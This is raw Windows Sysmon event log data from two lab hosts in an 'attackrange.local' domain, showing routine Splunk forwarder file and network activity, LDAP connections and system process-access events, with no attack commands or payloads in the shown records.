23542300x8000000000000000150439Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:26.849{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F36062AEDD23B909523B034DC9DABC96,SHA256=3CD73D8B117DA053B8B789139537B743EB69B58B60D3F8894D0F8371CB07C6C0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104795Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:45:27.682{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B4DE17171BB58F8FB6B7DFCEBA71EDBB,SHA256=805F05ACBECFB13CA94D1275791A2405B91E6488946951EBD4CCF35A325658B8,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000104794Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:45:25.769{54715871-FD33-60C9-6D00-00000000CF01}3756C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-681.attackrange.local55406-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000150440Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:27.865{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=290189E8177B9948F6CFB52FF872AFDE,SHA256=D3C3467491A0239B71605A0D16CEE44E2DB24F383935961866A9A4FF64F65C5D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000150441Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:28.881{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AE33D4B825AF35AA9E1587DFA3ADBACE,SHA256=1F3059ED866DB1959CF0E9019EEEBE6FD10AA551FDA352E613E7508DDDD51D59,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104796Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:45:29.621{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=60486D7D5CCDD400B67775C2263B4199,SHA256=0DFB3D2200C03D171124978C657A6A5EAE9F3A91A32271A9A7043FA89B487EEF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000150444Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:29.899{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4EAAAA3EC8F29B4F97770D0FC34180E9,SHA256=33B7194FF57EC8EF577209C833A74F1357C8E5E12EB0A5267BE5C3F03E5871E0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000150443Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:29.218{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1B6A250875AEF1F36ADF29FA846CEF32,SHA256=4348ABEF98449E1E31725D5D6D14BFF708855EBB79E9F8CF0811B76489F327FF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000150442Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:29.218{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F51132377A43AB61C22E8C3ADFAD1792,SHA256=81F774586B15E732CEA9601961A74A8F20D427B551CA3324ED0CAEE7D815F84B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000150446Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:30.901{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D3C114635FC07FFEE4B37D5B274B5152,SHA256=24DEB4E57E7494A5A3CE697AD4E2416D5D06B621272492CA0DCABA56899058FE,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000150445Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:28.017{39BD8DE3-4818-60CA-2408-00000000D101}4064C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-14.attackrange.local58387-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000104797Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:45:31.014{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=01442091AC258FC9B87C6593E0EF1EB3,SHA256=9DA5D20FE84DD1DFCFD560F44AD85B964FD932777306CF2632C516B06F8C04AB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000150447Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:31.903{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C36AD10DA22D147A32FB252BA13C45D4,SHA256=F9D16A74D2DFC19F1CC4576274FF79D3CDD21F207FA7A61D6C277A01DDA26606,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104798Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:45:32.386{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8616B1E5ADFC3B2A4DE7ACE5DC18B960,SHA256=209B5EBB4165869B0DFC9C74C796B986F4E460A4FA4F8B5CD5B34EC90EFFB8E8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000150448Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:32.933{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0486659664C566A51CF63B87EDABEB21,SHA256=C9FDA5638F68C0C5B9D352E77E2F1C98D1CC3588727DE0C688CF8E791B901ED0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104800Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:45:33.753{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E6EDAF2B139287579DB140190A663F46,SHA256=E7195F365AD43F5F664242CC35373AB7D5B3D887A621E105A9D06FE4A3CDABC1,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000104799Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:45:31.725{54715871-FD33-60C9-6D00-00000000CF01}3756C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-681.attackrange.local55407-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000150449Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:33.950{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=983B4A3F2393B1DE8D47427D463E5608,SHA256=A6F327C61B6D871E47DAF0CDABA782C7AA7884457A0629EA5ACE589A75AEFB87,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104801Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:45:34.441{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CCC06BC7640EE916DFA65E3C673EF9C3,SHA256=1EB9D13E87CE1CA015BA41A069197678CC2519D8BD0F0E94C01B0C18EAB1E5F2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000150450Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:34.965{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4E2F0DD0B69579836D666CDF2C7B7C00,SHA256=A304806F10E95CB4BE52BDD35B52C24BC72C1E9B08C16B06533ED2E5AF801932,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104802Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:45:35.118{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E6A7A5C6C581208D78840DC49D3B4239,SHA256=93661A826FFC268937560445A89C0AABB8CAA7BFE16EC38EE4DD36825D8EAECA,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000150453Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:33.916{39BD8DE3-4818-60CA-2408-00000000D101}4064C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-14.attackrange.local58388-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000150452Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:35.133{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5756467506564A38784CCB1FA97A3907,SHA256=AF98D3C1B698D8DF6C2FFC21314845468A62B1794D2254903C0E010ACB36DE13,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000150451Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:35.133{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1B6A250875AEF1F36ADF29FA846CEF32,SHA256=4348ABEF98449E1E31725D5D6D14BFF708855EBB79E9F8CF0811B76489F327FF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104803Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:45:36.484{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7E11766724B2B349D34081B2706F85AB,SHA256=1180EBAFB9AE8D4ED74D180EF6AB73F61BAD17C2870A7EA0F4D8363CBACBD3B2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000150454Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:36.000{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D1D2781116139F9F63627DA34FC2597F,SHA256=3DADB048BD4D6312AC004AF862BD502BC446BECBA56C0321F59FCA65B2F8FC66,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104806Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:45:37.849{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E04BF3F61AD17AB38A11865514C3B885,SHA256=B8F1D5B12A173333555EB1E0A22BB71C9F91300C92770304CF4B49A7C43D9241,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000104805Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:45:36.244{54715871-FD16-60C9-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-681.attackrange.local55408-true0:0:0:0:0:0:0:1win-dc-681.attackrange.local389ldap 354300x8000000000000000104804Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:45:36.244{54715871-FD28-60C9-2600-00000000CF01}2840C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-681.attackrange.local55408-true0:0:0:0:0:0:0:1win-dc-681.attackrange.local389ldap 23542300x8000000000000000150455Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:37.017{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C33DD2954FEB54234C3E7DA686BAEE2B,SHA256=AC12FFB60B7AD9A287D69202D462E44CB376A88D94E16892FC2E3B0D6E43E898,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000150456Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:38.080{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B0A1F7C6D82C6CAE9A60B7F48104D0B4,SHA256=38D509FFB8CCF744087ED187F62C47CC0D82E623321080B387A04B01034B1C44,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000104808Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:45:36.936{54715871-FD33-60C9-6D00-00000000CF01}3756C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-681.attackrange.local55409-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000104807Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:45:39.210{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D69207D70BA445259802B9A3FF7F5D78,SHA256=95F80039B8C56CFEE9714C7FE231E61A7D19E20DACC267302477A9C9AC7374E2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000150457Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:39.100{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3A66378045ED285DD3B3E72BE99A1FF4,SHA256=9C43F678C528BA7CD8B1496E1B109045FA64843879084E8651B42308F9E58AB7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104809Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:45:40.573{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0AE842C97404A65D067897B9BD5E1CDA,SHA256=BF2525E8E0CD49CF1A803BFC5C953F4F27F60A68ADE6A0BE8BE33394E2020C5F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000150460Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:40.231{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=557A475345A1B9A0A4BC354F57D0B3E6,SHA256=615B5FF020A36EC311A9647D5A25D59732D3B8A0AFF350B28FCA07729304D4B2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000150459Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:40.231{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5756467506564A38784CCB1FA97A3907,SHA256=AF98D3C1B698D8DF6C2FFC21314845468A62B1794D2254903C0E010ACB36DE13,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000150458Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:40.116{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6FE4E117F2204E9BA583C5DB86972515,SHA256=183B017E771F99B86E9A9A8F228A9A958A375CAFE3C537EF97FF5178EF83F9E2,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000151122Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.933{39BD8DE3-0F65-60CA-1600-00000000D101}1164476C:\Windows\system32\svchost.exe{39BD8DE3-7105-60CA-1A0D-00000000D101}3200C:\Windows\system32\wbem\wmiprvse.exe0x101541C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+20fee|C:\Windows\system32\wbem\wmiprvsd.dll+4a819|C:\Windows\system32\wbem\wmiprvsd.dll+4c403|C:\Windows\system32\wbem\FastProx.dll+809ca|C:\Windows\system32\wbem\wbemcore.dll+929b0|C:\Windows\system32\wbem\FastProx.dll+807b3|C:\Windows\system32\wbem\FastProx.dll+8f7e7|C:\Windows\system32\wbem\FastProx.dll+8e50c|C:\Windows\system32\wbem\FastProx.dll+8e1f5|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde 18141800x8000000000000000151121Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-ConnectPipe2021-06-16 21:45:41.933{39BD8DE3-7105-60CA-1A0D-00000000D101}3200\PIPE_EVENTROOT\CIMV2PROVIDERSUBSYSTEMC:\Windows\system32\wbem\wmiprvse.exe 10341000x8000000000000000151120Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.933{39BD8DE3-0F64-60CA-0C00-00000000D101}7201900C:\Windows\system32\svchost.exe{39BD8DE3-7105-60CA-1A0D-00000000D101}3200C:\Windows\system32\wbem\wmiprvse.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x8000000000000000151119Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:39.035{39BD8DE3-4818-60CA-2408-00000000D101}4064C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-14.attackrange.local58389-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 10341000x8000000000000000151118Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.917{39BD8DE3-0F63-60CA-0500-00000000D101}408976C:\Windows\system32\csrss.exe{39BD8DE3-7105-60CA-1A0D-00000000D101}3200C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000151117Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.917{39BD8DE3-0F64-60CA-0C00-00000000D101}7201900C:\Windows\system32\svchost.exe{39BD8DE3-7105-60CA-1A0D-00000000D101}3200C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+36349|c:\windows\system32\rpcss.dll+3bb32|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151116Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.901{39BD8DE3-0F64-60CA-0C00-00000000D101}7201900C:\Windows\system32\svchost.exe{39BD8DE3-0F64-60CA-0B00-00000000D101}624C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151115Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.901{39BD8DE3-0F64-60CA-0C00-00000000D101}7201900C:\Windows\system32\svchost.exe{39BD8DE3-0F64-60CA-0B00-00000000D101}624C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151114Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 